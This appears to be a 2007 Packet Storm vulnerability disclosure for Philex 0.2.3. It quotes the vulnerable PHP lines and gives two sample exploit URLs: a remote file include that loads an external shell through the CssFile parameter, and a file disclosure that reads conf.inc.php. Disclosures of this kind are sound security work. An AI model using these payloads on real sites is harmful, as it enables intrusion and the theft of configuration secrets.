philex-disclose.txt

2007-03-24T00:00:00
ID PACKETSTORM:55330
Type packetstorm
Reporter GolD_M
Modified 2007-03-24T00:00:00

Description

                                        
                                            `######################################################  
# Philex 0.2.3 <= Remote File(Disclosure/Include)Vulnerabilities  
# D.Script: http://kent.dl.sourceforge.net/sourceforge/philex/philex_0.2.3.tgz  
# Discovered by: GloD_M = [Mahmood_ali]  
# Homepage: http://www.Tryag.cc  
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group  
######################################################  
# V.Code Include: #  
# <?include $CssFile;?> #  
# Exploit Remote File Include: #  
# [Path_Philex]/header.inc.php?CssFile=Shell #  
######################################################  
# V.Code Disclosure: #  
# readfile($HTTP_GET_VARS["file"]); #  
# Exploit Remote File Disclosure: #  
# [Path_Philex]/download.php?file=conf.inc.php #  
######################################################  
  
`